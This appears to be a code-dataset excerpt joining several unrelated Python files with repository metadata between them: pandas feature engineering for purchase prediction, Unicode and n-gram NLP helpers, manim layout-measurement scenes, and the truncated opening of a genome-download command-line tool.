피처 생성 test_agg = test.groupby(['customer_id']).agg(agg_func) test_agg.columns = new_cols test_data = test_label.merge(test_agg, on=['customer_id'], how='left') # train, test 데이터 전처리 x_tr, x_te = feature_preprocessing(all_train_data, test_data, features) print('x_tr.shape', x_tr.shape, ', x_te.shape', x_te.shape) return x_tr, x_te, all_train_data['label'], features def feature_engineering1(df, year_month): df = df.copy() # customer_id 기준으로 pandas group by 후 total, quantity, price 누적합 계산 df['cumsum_total_by_cust_id'] = df.groupby(['customer_id'])['total'].cumsum() df['cumsum_quantity_by_cust_id'] = df.groupby(['customer_id'])['quantity'].cumsum() df['cumsum_price_by_cust_id'] = df.groupby(['customer_id'])['price'].cumsum() # product_id 기준으로 pandas group by 후 total, quantity, price 누적합 계산 df['cumsum_total_by_prod_id'] = df.groupby(['product_id'])['total'].cumsum() df['cumsum_quantity_by_prod_id'] = df.groupby(['product_id'])['quantity'].cumsum() df['cumsum_price_by_prod_id'] = df.groupby(['product_id'])['price'].cumsum() # order_id 기준으로 pandas group by 후 total, quantity, price 누적합 계산 df['cumsum_total_by_order_id'] = df.groupby(['order_id'])['total'].cumsum() df['cumsum_quantity_by_order_id'] = df.groupby(['order_id'])['quantity'].cumsum() df['cumsum_price_by_order_id'] = df.groupby(['order_id'])['price'].cumsum() # year_month 이전 월 계산 d = datetime.datetime.strptime(year_month, "%Y-%m") prev_ym = d - dateutil.relativedelta.relativedelta(months=1) prev_ym = prev_ym.strftime('%Y-%m') # train, test 데이터 선택 train = df[df['order_date'] < prev_ym] test = df[df['order_date'] < year_month] # train, test 레이블 데이터 생성 train_label = generate_label(df, prev_ym)[['customer_id', 'year_month', 'label']] test_label = generate_label(df, year_month)[['customer_id', 'year_month', 'label']] # group by aggregation 함수 선언 agg_func = ['mean', 'max', 'min', 'sum', 'count', 'std', 'skew'] agg_dict = { 'quantity': agg_func, 'price': agg_func, 'total': agg_func, 'cumsum_total_by_cust_id': agg_func, 'cumsum_quantity_by_cust_id': agg_func, 'cumsum_price_by_cust_id': agg_func, 'cumsum_total_by_prod_id': agg_func, 'cumsum_quantity_by_prod_id': agg_func, 'cumsum_price_by_prod_id': agg_func, 'cumsum_total_by_order_id': agg_func, 'cumsum_quantity_by_order_id': agg_func, 'cumsum_price_by_order_id': agg_func, 'order_id': ['nunique'], 'product_id': ['nunique'], } all_train_data = pd.DataFrame() for i, tr_ym in enumerate(train_label['year_month'].unique()): # group by aggretation 함수로 train 데이터 피처 생성 train_agg = train.loc[train['order_date'] < tr_ym].groupby(['customer_id']).agg(agg_dict) new_cols = [] for col in agg_dict.keys(): for stat in agg_dict[col]: if type(stat) is str: new_cols.append(f'{col}-{stat}') else: new_cols.append(f'{col}-mode') train_agg.columns = new_cols train_agg.reset_index(inplace=True) train_agg['year_month'] = tr_ym all_train_data = all_train_data.append(train_agg) all_train_data = train_label.merge(all_train_data, on=['customer_id', 'year_month'], how='left') features = all_train_data.drop(columns=['customer_id', 'label', 'year_month']).columns # group by aggretation 함수로 test 데이터 피처 생성 test_agg = test.groupby(['customer_id']).agg(agg_dict) test_agg.columns = new_cols test_data = test_label.merge(test_agg, on=['customer_id'], how='left') # train, test 데이터 전처리 x_tr, x_te = feature_preprocessing(all_train_data, test_data, features) print('x_tr.shape', x_tr.shape, ', x_te.shape', x_te.shape) return x_tr, x_te, all_train_data['label'], features # def get_year_month_list(df, year_month): # df = df.copy() # # df['year_month-mode'] = df['order_date'].dt.strftime('%Y-%m') # dd = df.groupby(['year_month-mode', 'customer_id'])['total'].sum() # cust_ids = df['customer_id'].unique() # # # year_month 이전 월 계산 # bef_12_d = datetime.datetime.strptime(year_month, "%Y-%m") # bef_12_prev_ym = bef_12_d - dateutil.relativedelta.relativedelta(months=12) # bef_12_prev_ym = bef_12_prev_ym.strftime('%Y-%m') # # # ddt = df[df['year_month-mode'] == bef_12_prev_ym] # # first_bef = [] # for id in cust_ids: # dd[:, bef_12_prev_ym] # # first_bef.append(dd.xs((id, bef_12_prev_ym))) # # # df['cycle_month'] = pd.Series(first_bef) # # print(df) def make_time_series_data(df, Input, year_month, stand): # 기준을 잡습니다. 기준은 여기서 %Y-%m 입니다. standard = ['customer_id'] + [stand] data = Input.copy() df = df.copy() data[stand] = pd.to_datetime(df['order_date']).dt.strftime(stand) data.order_date = pd.to_datetime(data['order_date']) # 월단위의 틀을 만들어주고, 기준으로 aggregation을 해준 다음에 merge를 해줄 것입니다 times = pd.date_range('2009-12-01', periods=(data.order_date.max() - data.order_date.min()).days + 1, freq='1d') customerid_frame = np.repeat(data.customer_id.unique(), len(times)) date_frame = np.tile(times, len(data.customer_id.unique())) frame = pd.DataFrame({'customer_id': customerid_frame, 'order_date': date_frame}) frame[stand] = pd.to_datetime(frame.order_date).dt.strftime(stand) # group by data_group = data.groupby(standard).sum().reset_index() frame_group = frame.groupby(standard).count().reset_index().drop(['order_date'], axis=1) # merge merge = pd.merge(frame_group, data_group, on=standard, how='left').fillna(0) merge = merge.rename(columns={stand: 'standard'}) merge_test = merge[merge['standard'] == year_month].drop(columns=['standard', 'quantity', 'price']) #.drop(merge.columns.tolist() - ['customer_id', 'total']) return merge_test def add_trend(df, year_month): df = df.copy() df['year_month'] = df['order_date'].dt.strftime('%Y-%m') # year_month 이전 월 계산 d = datetime.datetime.strptime(year_month, "%Y-%m") prev_ym = d - dateutil.relativedelta.relativedelta(months=1) # train과 test 데이터 생성 train = df[df['order_date'] < prev_ym] # 2009-12부터 2011-10 데이터 추출 test = df[df['order_date'] < year_month] # 2009-12부터 2011-11 데이터 추출 train_window_ym = [] test_window_ym = [] for month_back in [1, 2, 3, 5, 7, 12, 20, 23]: # 1개월, 2개월, ... 20개월, 23개월 전 year_month 파악 train_window_ym.append((prev_ym - dateutil.relativedelta.relativedelta(months=month_back)).strftime('%Y-%m')) test_window_ym.append((d - dateutil.relativedelta.relativedelta(months=month_back)).strftime('%Y-%m')) # aggregation 함수 선언 agg_func = ['max', 'min', 'sum', 'mean', 'count', 'std', 'skew'] # group by aggregation with Dictionary agg_dict = { 'quantity': agg_func, 'price': agg_func, 'total': agg_func, } # general statistics for train data with time series trend for i, tr_ym in enumerate(train_window_ym): # group by aggretation 함수로 train 데이터 피처 생성 train_agg = train.loc[train['year_month'] >= tr_ym].groupby(['customer_id']).agg( agg_dict) # 해당 year_month 이후부터 모든 데이터에 대한 aggregation을 실시 # 멀티 레벨 컬럼을 사용하기 쉽게 1 레벨 컬럼명으로 변경 new_cols = [] for level1, level2 in train_agg.columns: new_cols.append(f'{level1}-{level2}-{i}') train_agg.columns = new_cols train_agg.reset_index(inplace=True) if i == 0: train_data = train_agg else: train_data = train_data.merge(train_agg, on=['customer_id'], how='right') # general statistics for test data with time series trend for i, tr_ym in enumerate(test_window_ym): # group by aggretation 함수로 test 데이터 피처 생성 test_agg = test.loc[test['year_month'] >= tr_ym].groupby(['customer_id']).agg(agg_dict) # 멀티 레벨 컬럼을 사용하기 쉽게 1 레벨 컬럼명으로 변경 new_cols = [] for level1, level2 in test_agg.columns: new_cols.append(f'{level1}-{level2}-{i}') test_agg.columns = new_cols test_agg.reset_index(inplace=True) if i == 0: test_data = test_agg else: test_data = test_data.merge(test_agg, on=['customer_id'], how='right') return train_data, test_data def add_seasonality(df, year_month): df = df.copy() df['year_month'] = df['order_date'].dt.strftime('%Y-%m') # year_month 이전 월 계산 d = datetime.datetime.strptime(year_month, "%Y-%m") prev_ym = d - dateutil.relativedelta.relativedelta(months=1) # train과 test 데이터 생성 train = df[df['order_date'] < prev_ym] # 2009-12부터 2011-10 데이터 추출 test = df[df['order_date'] < year_month] # 2009-12부터 2011-11 데이터 추출 train_window_ym = [] test_window_ym = [] for month_back in [1, 6, 12, 18]: # 각 주기성을 파악하고 싶은 구간을 생성 train_window_ym.append( ( (prev_ym - dateutil.relativedelta.relativedelta(months=month_back)).strftime('%Y-%m'), (prev_ym - dateutil.relativedelta.relativedelta(months=month_back + 2)).strftime('%Y-%m') # 1~3, 6~8, 12~14, 18~20 Pair를 만들어준다 ) ) test_window_ym.append( ( (d - dateutil.relativedelta.relativedelta(months=month_back)).strftime('%Y-%m'), (d - dateutil.relativedelta.relativedelta(months=month_back + 2)).strftime('%Y-%m') ) ) # aggregation 함수 선언 agg_func = ['max', 'min', 'sum', 'mean', 'count', 'std', 'skew'] # group by aggregation with Dictionary agg_dict = { 'quantity': agg_func, 'price': agg_func, 'total': agg_func, } # seasonality for train data with time series for i, (tr_ym, tr_ym_3) in enumerate(train_window_ym): # group by aggretation 함수로 train 데이터 피처 생성 # 구간 사이에 존재하는 월들에 대해서 aggregation을 진행 train_agg = train.loc[(train['year_month'] >= tr_ym_3) & (train['year_month'] <= tr_ym)].groupby( ['customer_id']).agg(agg_dict) # 멀티 레벨 컬럼을 사용하기 쉽게 1 레벨 컬럼명으로 변경 new_cols = [] for level1, level2 in train_agg.columns: new_cols.append(f'{level1}-{level2}-season{i}') train_agg.columns = new_cols train_agg.reset_index(inplace=True) if i == 0: train_data = train_agg else: train_data = train_data.merge(train_agg, on=['customer_id'], how='right') # seasonality for test data with time series for i, (tr_ym, tr_ym_3) in enumerate(test_window_ym): # group by aggretation 함수로 train 데이터 피처 생성 test_agg = test.loc[(test['year_month'] >= tr_ym_3) & (test['year_month'] <= tr_ym)].groupby( ['customer_id']).agg(agg_dict) # 멀티 레벨 컬럼을 사용하기 쉽게 1 레벨 컬럼명으로 변경 new_cols = [] for level1, level2 in test_agg.columns: new_cols.append(f'{level1}-{level2}-season{i}') test_agg.columns = new_cols test_agg.reset_index(inplace=True) if i == 0: test_data = test_agg else: test_data = test_data.merge(test_agg, on=['customer_id'], how='right') return train_data, test_data def feature_engineering2(df, year_month): df = df.copy() # customer_id 기준으로 pandas group by 후 total, quantity, price 누적합 계산 df['cumsum_total_by_cust_id'] = df.groupby(['customer_id'])['total'].cumsum() df['cumsum_quantity_by_cust_id'] = df.groupby(['customer_id'])['quantity'].cumsum() df['cumsum_price_by_cust_id'] = df.groupby(['customer_id'])['price'].cumsum() # product_id 기준으로 pandas group by 후 total, quantity, price 누적합 계산 df['cumsum_total_by_prod_id'] = df.groupby(['product_id'])['total'].cumsum() df['cumsum_quantity_by_prod_id'] = df.groupby(['product_id'])['quantity'].cumsum() df['cumsum_price_by_prod_id'] = df.groupby(['product_id'])['price'].cumsum() # order_id 기준으로 pandas group by 후 total, quantity, price 누적합 계산 df['cumsum_total_by_order_id'] = df.groupby(['order_id'])['total'].cumsum() df['cumsum_quantity_by_order_id'] = df.groupby(['order_id'])['quantity'].cumsum() df['cumsum_price_by_order_id'] = df.groupby(['order_id'])['price'].cumsum() # oredr_ts df['order_ts'] = df['order_date'].astype(np.int64)//1e9 df['order_ts_diff'] = df.groupby(['customer_id'])['order_ts'].diff() df['quantity_diff'] = df.groupby(['customer_id'])['quantity'].diff() df['price_diff'] = df.groupby(['customer_id'])['price'].diff() df['total_diff'] = df.groupby(['customer_id'])['total'].diff() # mode df['month-mode'] = df['order_date'].dt.month df['year_month-mode'] = df['order_date'].dt.strftime('%Y-%m') # oredr_ts_plus === df['order_ts_plus'] = df[df['total'] > 0]['order_date'].astype(np.int64) // 1e9 df['order_ts_plus_diff'] = df[df['total'] > 0].groupby(['customer_id'])['order_ts'].diff() df['order_ts_plus'] = df['order_ts_plus'].fillna(0) df['order_ts_plus_diff'] = df['order_ts_plus_diff'].fillna(0) # df[~(df.order_id.str.contains('C'))].groupby(['customer_id'])['order_date'].last().astype(np.int64) // 1e9 # ================================================================================================ # year_month 이전 월 계산 d = datetime.datetime.strptime(year_month, "%Y-%m") prev_ym = d - dateutil.relativedelta.relativedelta(months=1) prev_ym = prev_ym.strftime('%Y-%m') # train, test 데이터 선택 train = df[df['order_date'] < prev_ym] test = df[df['order_date'] < year_month] # train, test 레이블 데이터 생성 train_label = generate_label(df, prev_ym)[['customer_id', 'year_month', 'label']] test_label = generate_label(df, year_month)[['customer_id', 'year_month', 'label']] # ================================================================================================ # 연월 피처 생성 target = datetime.datetime.strptime('2011-11', "%Y-%m") # 타겟 연월 prev = target - dateutil.relativedelta.relativedelta(years=1) # 전년 연월 prev = prev.strftime('%Y-%m') # 문자열로 변환 groupby = train.groupby(['customer_id', 'year_month-mode'])['total'].sum() # 고객별, 월별 total 합 groupby = groupby.unstack() # 월별을 컬럼으로 변환 prev_pprev_total = groupby.loc[:, [prev]] # 전년, 전전년 데이터만 추출 prev_pprev_total = prev_pprev_total.fillna(0) train_1224 = (prev_pprev_total['2010-11']) / 2 target = datetime.datetime.strptime('2011-12', "%Y-%m") # 타겟 연월 prev = target - dateutil.relativedelta.relativedelta(years=1) # 전년 연월 pprev = prev - dateutil.relativedelta.relativedelta(years=1) # 전전년 연월 prev, pprev = prev.strftime('%Y-%m'), pprev.strftime('%Y-%m') # 문자열로 변환 groupby = test.groupby(['customer_id', 'year_month-mode'])['total'].sum() # 고객별, 월별 total 합 groupby = groupby.unstack() # 월별을 컬럼으로 변환 prev_pprev_total = groupby.loc[:, [prev, pprev]] # 전년, 전전년 데이터만 추출 prev_pprev_total = prev_pprev_total.fillna(0) test_1224 = (prev_pprev_total['2010-12'] + prev_pprev_total['2009-12']) / 2 # ================================================================================================ # lambda 식 mode_f = lambda x: x.value_counts().index[0] # group by aggregation 함수 선언 agg_func = ['mean', 'max', 'min', 'sum', 'count', 'std', 'skew'] # agg_func = ['mean', 'max'] # , 'min', 'sum', 'count', 'std', 'skew'] agg_dict = { 'order_ts': ['first', 'last'], 'order_ts_diff': agg_func, 'order_ts_plus': ['first', 'last'], 'order_ts_plus_diff': agg_func, 'quantity_diff': agg_func, 'price_diff': agg_func, 'total_diff': agg_func, 'quantity': agg_func, 'price': agg_func, 'total': agg_func, 'cumsum_total_by_cust_id': agg_func, 'cumsum_quantity_by_cust_id': agg_func, 'cumsum_price_by_cust_id': agg_func, 'cumsum_total_by_prod_id': agg_func, 'cumsum_quantity_by_prod_id': agg_func, 'cumsum_price_by_prod_id': agg_func, 'cumsum_total_by_order_id': agg_func, 'cumsum_quantity_by_order_id': agg_func, 'cumsum_price_by_order_id': agg_func, 'order_id': ['nunique'], 'product_id': ['nunique'], 'month-mode': [mode_f], 'year_month-mode': [mode_f], } all_train_data = pd.DataFrame() for i, tr_ym in enumerate(train_label['year_month'].unique()): # group by aggretation 함수로 train 데이터 피처 생성 train_agg = train.loc[train['order_date'] < tr_ym].groupby(['customer_id']).agg(agg_dict) new_cols = [] for col in agg_dict.keys(): for stat in agg_dict[col]: if type(stat) is str: new_cols.append(f'{col}-{stat}') else: new_cols.append(f'{col}-mode') train_agg.columns = new_cols train_agg.reset_index(inplace=True) train_agg['year_month'] = tr_ym all_train_data = all_train_data.append(train_agg) all_train_data = train_label.merge(all_train_data, on=['customer_id', 'year_month'], how='left') all_train_data['cycle_1224'] = train_1224.to_numpy() # ================================================================================================ data = pd.read_csv("/opt/ml/code/input/train.csv", parse_dates=["order_date"]) # # baseline feature engineering # train, test, y, features = feature_engineering(data, '2011-12') # trend train_t, test_t = add_trend(data, year_month='2011-12') # seasonality train_s, test_s = add_seasonality(data, year_month='2011-12') # train 데이터 병합 all_train_data = all_train_data.merge(train_t, on=['customer_id'], how='left') all_train_data = all_train_data.merge(train_s, on=['customer_id'], how='left') all_train_data = all_train_data.fillna(0) # ================================================================================================ features = all_train_data.drop(columns=['customer_id', 'label', 'year_month']).columns print(features.shape) import csv with open("../output/feature.csv", 'w', newline='') as f: writer = csv.writer(f) for items in features.tolist(): print(items) writer.writerow([items]) test_agg = test.groupby(['customer_id']).agg(agg_dict) test_agg.columns = new_cols test_agg['cycle_1224'] = test_1224 test_data = test_label.merge(test_agg, on=['customer_id'], how='left') # test 데이터 병합 =================================================================================== test_data = test_data.merge(test_t, on=['customer_id'], how='left') test_data = test_data.merge(test_s, on=['customer_id'], how='left') test_data = test_data.fillna(0) # train, test 데이터 전처리 print(all_train_data.shape) print(test_data.shape) x_tr, x_te = feature_preprocessing(all_train_data, test_data, features) print('x_tr.shape', x_tr.shape, ', x_te.shape', x_te.shape) return x_tr, x_te, all_train_data['label'], features def feature_engineering3(df, year_month): my_pick = [ 'order_ts-last', 'order_ts-first', 'price_diff-skew', 'price-skew', 'order_ts_diff-max', 'quantity_diff-skew', 'cumsum_total_by_prod_id-skew', 'cumsum_price_by_prod_id-skew', 'cumsum_total_by_cust_id-skew', 'cumsum_quantity_by_prod_id-sum', 'quantity-skew', 'cumsum_total_by_order_id-skew', 'cumsum_price_by_cust_id-skew', 'cumsum_price_by_order_id-skew', 'year_month-mode', 'total_diff-skew', 'price-mean', 'cumsum_quantity_by_order_id-skew', 'cumsum_quantity_by_prod_id-skew', 'price_diff-mean', ] df = df.copy() # customer_id 기준으로 pandas group by 후 total, quantity, price 누적합 계산 df['cumsum_total_by_cust_id'] = df.groupby(['customer_id'])['total'].cumsum() df['cumsum_quantity_by_cust_id'] = df.groupby(['customer_id'])['quantity'].cumsum() df['cumsum_price_by_cust_id'] = df.groupby(['customer_id'])['price'].cumsum() # product_id 기준으로 pandas group by 후 total, quantity, price 누적합 계산 df['cumsum_total_by_prod_id'] = df.groupby(['product_id'])['total'].cumsum() df['cumsum_quantity_by_prod_id'] = df.groupby(['product_id'])['quantity'].cumsum() df['cumsum_price_by_prod_id'] = df.groupby(['product_id'])['price'].cumsum() # order_id 기준으로 pandas group by 후 total, quantity, price 누적합 계산 df['cumsum_total_by_order_id'] = df.groupby(['order_id'])['total'].cumsum() df['cumsum_quantity_by_order_id'] = df.groupby(['order_id'])['quantity'].cumsum() df['cumsum_price_by_order_id'] = df.groupby(['order_id'])['price'].cumsum() # oredr_ts df['order_ts'] = df['order_date'].astype(np.int64)//1e9 df['order_ts_diff'] = df.groupby(['customer_id'])['order_ts'].diff() df['quantity_diff'] = df.groupby(['customer_id'])['quantity'].diff() df['price_diff'] = df.groupby(['customer_id'])['price'].diff() df['total_diff'] = df.groupby(['customer_id'])['total'].diff() # mode df['month-mode'] = df['order_date'].dt.month df['year_month-mode'] = df['order_date'].dt.strftime('%Y-%m') # oredr_ts_plus === df['order_ts_plus'] = df[df['total'] > 0]['order_date'].astype(np.int64) // 1e9 df['order_ts_plus_diff'] = df[df['total'] > 0].groupby(['customer_id'])['order_ts'].diff() df['order_ts_plus'] = df['order_ts_plus'].fillna(0) df['order_ts_plus_diff'] = df['order_ts_plus_diff'].fillna(0) # df[~(df.order_id.str.contains('C'))].groupby(['customer_id'])['order_date'].last().astype(np.int64) // 1e9 # ================================================================================================ # year_month 이전 월 계산 d = datetime.datetime.strptime(year_month, "%Y-%m") prev_ym = d - dateutil.relativedelta.relativedelta(months=1) prev_ym = prev_ym.strftime('%Y-%m') # train, test 데이터 선택 train = df[df['order_date'] < prev_ym] test = df[df['order_date'] < year_month] # train, test 레이블 데이터 생성 train_label = generate_label(df, prev_ym)[['customer_id', 'year_month', 'label']] test_label = generate_label(df, year_month)[['customer_id', 'year_month', 'label']] #################################################################################### # year_month 이전 월 계산 bef_12_d1 = datetime.datetime.strptime(year_month, "%Y-%m") bef_12_prev_ym1 = bef_12_d1 - dateutil.relativedelta.relativedelta(months=12) bef_12_prev_ym1 = bef_12_prev_ym1.strftime('%Y-%m') merge_df_12_train = make_time_series_data(train, train, bef_12_prev_ym1, "%Y-%m") print(bef_12_prev_ym1) bef_24_d1 = datetime.datetime.strptime(year_month, "%Y-%m") bef_24_prev_ym1 = bef_24_d1 - dateutil.relativedelta.relativedelta(months=24) bef_24_prev_ym1 = bef_24_prev_ym1.strftime('%Y-%m') merge_df_24_train = make_time_series_data(train, train, bef_24_prev_ym1, "%Y-%m") print(bef_24_prev_ym1) merge_1224_train = merge_df_24_train.merge(merge_df_12_train, on=['customer_id'], how='left') series_1224_train = (merge_1224_train['total_x'] + merge_1224_train['total_y']) / 2 #################################################################################### # year_month 이전 월 계산 bef_12_d2 = datetime.datetime.strptime(prev_ym, "%Y-%m") bef_12_prev_ym2 = bef_12_d2 - dateutil.relativedelta.relativedelta(months=12) bef_12_prev_ym2 = bef_12_prev_ym2.strftime('%Y-%m') merge_df_12_test = make_time_series_data(test, test, bef_12_prev_ym2, "%Y-%m") print(bef_12_prev_ym2) bef_24_d2 = datetime.datetime.strptime(prev_ym, "%Y-%m") bef_24_prev_ym2 = bef_24_d2 - dateutil.relativedelta.relativedelta(months=24) bef_24_prev_ym2 = bef_24_prev_ym2.strftime('%Y-%m') merge_df_24_test = make_time_series_data(test, test, bef_24_prev_ym2, "%Y-%m") print(bef_24_prev_ym2) merge_1224_test = merge_df_24_test.merge(merge_df_12_test, on=['customer_id'], how='left') series_1224_test = (merge_1224_test['total_x'] + merge_1224_test['total_y']) / 2 #################################################################################### # lambda 식 mode_f = lambda x: x.value_counts().index[0] # group by aggregation 함수 선언 # agg_func = ['mean', 'max', 'min', 'sum', 'count', 'std', 'skew'] agg_func = ['mean', 'max'] # , 'min', 'sum', 'count', 'std', 'skew'] agg_dict = { 'order_ts': ['first', 'last'], 'order_ts_diff': agg_func, # 'order_ts_plus': ['first', 'last'], # 'order_ts_plus_diff': agg_func, # 'quantity_diff': agg_func, # 'price_diff': agg_func, # 'total_diff': agg_func, # 'quantity': agg_func, # 'price': agg_func, # 'total': agg_func, # 'cumsum_total_by_cust_id': agg_func, # 'cumsum_quantity_by_cust_id': agg_func, # 'cumsum_price_by_cust_id': agg_func, # 'cumsum_total_by_prod_id': agg_func, # 'cumsum_quantity_by_prod_id': agg_func, # 'cumsum_price_by_prod_id': agg_func, # 'cumsum_total_by_order_id': agg_func, # 'cumsum_quantity_by_order_id': agg_func, # 'cumsum_price_by_order_id': agg_func, # 'order_id': ['nunique'], # 'product_id': ['nunique'], # 'month-mode': [mode_f], # 'year_month-mode': [mode_f], } all_train_data = pd.DataFrame() for i, tr_ym in enumerate(train_label['year_month'].unique()): # group by aggretation 함수로 train 데이터 피처 생성 train_agg = train.loc[train['order_date'] < tr_ym].groupby(['customer_id']).agg(agg_dict) new_cols = [] for col in agg_dict.keys(): for stat in agg_dict[col]: if type(stat) is str: new_cols.append(f'{col}-{stat}') else: new_cols.append(f'{col}-mode') train_agg.columns = new_cols train_agg.reset_index(inplace=True) train_agg['year_month'] = tr_ym all_train_data = all_train_data.append(train_agg) all_train_data = train_label.merge(all_train_data, on=['customer_id', 'year_month'], how='left') all_train_data['cycle_1224'] = series_1224_train features = all_train_data.drop(columns=['customer_id', 'label', 'year_month']).columns import csv with open("../output/feature.csv", 'w', newline='') as f: writer = csv.writer(f) for items in features.tolist(): print(items) writer.writerow([items]) test_agg = test.groupby(['customer_id']).agg(agg_dict) test_agg.columns = new_cols test_agg['cycle_1224'] = series_1224_test test_data = test_label.merge(test_agg, on=['customer_id'], how='left') # train, test 데이터 전처리 x_tr, x_te = feature_preprocessing(all_train_data, test_data, features) # x_tr = x_tr[my_pick] # x_te = x_te[my_pick] # features = pd.Index(my_pick) print('x_tr.shape', x_tr.shape, ', x_te.shape', x_te.shape) return x_tr, x_te, all_train_data['label'], features if __name__ == '__main__': print('data_dir', data_dir)
31,616
0
206
6987eae1d20eb0280e52f15424abd63287a36aae
1,576
py
Python
nlp.py
ktrnka/helpers
b52102d81007301ed576c908c8f9fa5df386abbb
[ "MIT" ]
null
null
null
nlp.py
ktrnka/helpers
b52102d81007301ed576c908c8f9fa5df386abbb
[ "MIT" ]
null
null
null
nlp.py
ktrnka/helpers
b52102d81007301ed576c908c8f9fa5df386abbb
[ "MIT" ]
null
null
null
from __future__ import unicode_literals from __future__ import print_function import unicodedata import unittest """ Very simple assorted helpers for natural language processing that I've used a few times. """ _CHAR_TRANSLATIONS = { # chars to remove "\u00ae": None, "\u2122": None, # chars to normalize that aren't handled by combining char stripping "\u2018": "'", "\u2019": "'", "\u201c": '"', "\u201d": '"', "\u2013": "-", "\u2014": "-", "\u00bd": "1/2" } _CODEPOINT_TRANSLATIONS = {ord(k): v for k, v in _CHAR_TRANSLATIONS.items()} def strip_diacritics(s): """Remove accents and other diacritics""" return "".join(c for c in unicodedata.normalize("NFD", s) if unicodedata.category(c) != "Mn") def normalize_unicode(s): """Remove trademark sign, normalize smart quotes, etc""" return s.translate(_CODEPOINT_TRANSLATIONS)
25.419355
117
0.616117
from __future__ import unicode_literals from __future__ import print_function import unicodedata import unittest """ Very simple assorted helpers for natural language processing that I've used a few times. """ _CHAR_TRANSLATIONS = { # chars to remove "\u00ae": None, "\u2122": None, # chars to normalize that aren't handled by combining char stripping "\u2018": "'", "\u2019": "'", "\u201c": '"', "\u201d": '"', "\u2013": "-", "\u2014": "-", "\u00bd": "1/2" } _CODEPOINT_TRANSLATIONS = {ord(k): v for k, v in _CHAR_TRANSLATIONS.items()} def strip_diacritics(s): """Remove accents and other diacritics""" return "".join(c for c in unicodedata.normalize("NFD", s) if unicodedata.category(c) != "Mn") def normalize_unicode(s): """Remove trademark sign, normalize smart quotes, etc""" return s.translate(_CODEPOINT_TRANSLATIONS) def ngramify(sequence, n=3, start="^", end="$"): if start: sequence = [start] + sequence if end: sequence = sequence + [end] for i in range(n, len(sequence) + 1): yield tuple(sequence[i - n:i]) def get_hash_indicators(items, num_features): features = [0 for _ in range(num_features)] for item in items: features[hash(item) % num_features] += 1 return features class NlpTests(unittest.TestCase): def test_ngramify(self): self.assertSequenceEqual([("^", "This", "is"), ("This", "is", "a"), ("is", "a", "test"), ("a", "test", "$")], list(ngramify("This is a test".split())))
571
13
95
8c1a3c2529398f838d4805204cccfb8bf42655bf
2,471
py
Python
animations/measure_scene.py
61smiling/algorithm-stone
625bcef514a82ad93871987e81c6ec18b34f27cb
[ "MIT" ]
693
2021-02-22T03:52:10.000Z
2022-03-31T15:54:46.000Z
animations/measure_scene.py
Karen4tree/algorithm-stone
12e46463bb57929dfb4ab142f5cf0e8e69d460a8
[ "MIT" ]
5
2021-09-14T07:06:20.000Z
2022-01-04T02:49:11.000Z
animations/measure_scene.py
Karen4tree/algorithm-stone
12e46463bb57929dfb4ab142f5cf0e8e69d460a8
[ "MIT" ]
265
2021-02-28T02:35:44.000Z
2022-03-31T13:21:31.000Z
from manim_imports_ext import *
35.3
124
0.566977
from manim_imports_ext import * class MeasureScene(AlgoScene): def construct(self): shape = self.camera.frame.get_shape() font_size = 30 t = Text("1 width %.2f height %.2f delta 0.00"%(shape[0], shape[1]), color=GREEN, font_size=font_size).shift(LEFT*3) self.add(t) hw = shape[0]/2 hh = shape[1]/2 left = Line(start=LEFT*hw+UP*hh, end=LEFT*hw+DOWN*hh, color=BLUE) right = Line(start=RIGHT*hw+UP*hh, end=RIGHT*hw+DOWN*hh, color=BLUE_A) top = Line(start=LEFT*hw+UP*hh, end=RIGHT*hw+UP*hh, color=BLUE_B) bottom = Line(start=LEFT*hw+DOWN*hh, end=RIGHT*hw+DOWN*hh, color=BLUE_C) horizon = Line(start=LEFT*shape[0]/2, end=RIGHT*shape[0]/2, color=RED) verticle = Line(start=UP*shape[1]/2, end=DOWN*shape[1]/2, color=YELLOW) self.play(ShowCreation(horizon), ShowCreation(verticle), ShowCreation(left), ShowCreation(right), ShowCreation(top), ShowCreation(bottom)) t.next_to(horizon, direction=UP, buff=0) count = 2 delta = 0.0 lastcentery = t.get_center()[1] print("center:", t.get_center()) while True: nt = Text("%d width %.2f height %.2f delta %.2f"%(count, shape[0], shape[1], delta), color=GREEN, font_size=font_size).shift(LEFT*3) nt.next_to(t, direction=UP, buff=0) p = nt.get_center() print("center:", p) delta = p[1] - lastcentery t = nt lastcentery = p[1] if p[1] > shape[1]/2: break count += 1 self.play(ShowCreation(nt)) self.camera.frame.shift(OUT*10) self.snapshot() self.wait() class MeasureScene2(AlgoScene): def construct(self): shape = self.camera.frame.get_shape() horizon = Line(start=LEFT*shape[0]/2, end=RIGHT*shape[0]/2, color=RED) verticle = Line(start=UP*shape[1]/2, end=DOWN*shape[1]/2, color=BLUE) self.play(ShowCreation(horizon), ShowCreation(verticle)) delta = 0.0 v = VGroup() for i in range(12): nt = Text("%d width %.2f height %.2f delta %.2f"%(i, shape[0], shape[1], delta), color=GREEN).shift(LEFT*3) v.add(nt) v.arrange(direction=UP, aligned_edge=LEFT, buff=0.0) self.add(v) self.camera.frame.shift(OUT*10) self.snapshot() self.wait()
2,322
19
98
f730ed7aa9f9349f15c6cbfc5165fbc8a60781f3
1,755
py
Python
MGSIM/Commands/Genome_download.py
nick-youngblut/MGSIM
9edae3c170cf5100b3408a853a87e1205e70dd1b
[ "MIT" ]
3
2019-09-02T11:03:40.000Z
2021-12-13T15:59:06.000Z
MGSIM/Commands/Genome_download.py
nick-youngblut/MGSIM
9edae3c170cf5100b3408a853a87e1205e70dd1b
[ "MIT" ]
2
2020-11-13T13:04:47.000Z
2022-02-03T14:58:13.000Z
MGSIM/Commands/Genome_download.py
nick-youngblut/MGSIM
9edae3c170cf5100b3408a853a87e1205e70dd1b
[ "MIT" ]
1
2020-08-13T12:40:39.000Z
2020-08-13T12:40:39.000Z
#!/usr/bin/env python """ genome_download: downloading genomes Usage: genome_download [options] <accession_table> genome_download -h | --help genome_download --version Options: <accessin_table> Taxon-accession table (see Description). Use '-' if from STDIN. -d=<d> Output directory. [Default: .] -e=<e> Email to use for NCBI queries. [Default: blank@gmail.com] -a=<a> Number of ambiguous nucleotides allowed in a genome. [Default: 0] -n=<n> Number of cpus. [Default: 1] -t=<t> Number of tries to download genomes. [Default: 10] -r Rename genome sequences based on taxon name? --debug Debug mode (no multiprocessing). -h --help Show this screen. --version Show version. Description: Taxon-accession table --------------------- * tab-delimited * must contain 2 columns * "Taxon" = taxon name * "Accession" = NCBI accession used for downloading * Possible accessions: * ncbi nucleotide db * ncbi assembly db * ftp url to genome (direct download) * other columns are allowed Output ------ * Genome fasta files written to the specified output directory * A table 